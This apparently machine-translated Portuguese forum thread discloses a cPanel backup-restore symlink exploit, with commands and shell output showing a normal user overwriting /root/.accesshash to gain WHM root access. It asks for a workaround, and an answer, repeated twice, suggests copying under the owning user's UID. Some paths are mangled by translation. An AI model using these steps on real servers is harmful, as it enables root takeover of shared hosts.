Eu me certificaria de que os arquivos de backup sejam acessados pelo usuário ao qual eles pertencem e inicie o copy / rsync com o UID desse usuário. Desta forma, o cp / rsync não poderá seguir o link simbólico e escrever em /root .
Estou trabalhando em uma solução de backup do cPanel no momento. Estamos agora informados sobre essa façanha.
Exploit: ACESSO À ROOT TOTAL ao servidor
1.) crie um arquivo malicioso a partir de uma conta de usuário normal:
mkdir root
echo "hello" > root/.accesshash
2.) Aguarde o backup ser executado
3.) Substitua root por um symlink:
ln -s /root root
4.) Restaurar root / .accesshash (estou executando este comando como root para isso: "cp -rf /backup/.accesshash / home / username / root /")
5.) Usuário agora tem acesso root porque nós sobrescrevemos /root/.accesshash. Um invasor poderá fazer login no WHM como root, colocando um hash de acesso nesse arquivo.
root@cpanel [/home/master]# cat /root/.accesshash
hello
root@cpanel [/home/master]# ls -l /root/.accesshash
-rw-r--r-- 1 master master 3 Nov 20 21:41 /root/.accesshash
root@cpanel [/home/master]#
Alguém pode me aconselhar sobre isso para uma solução alternativa? Agradecemos antecipadamente.
Eu me certificaria de que os arquivos de backup sejam acessados pelo usuário ao qual eles pertencem e inicie o copy / rsync com o UID desse usuário. Desta forma, o cp / rsync não poderá seguir o link simbólico e escrever em /root .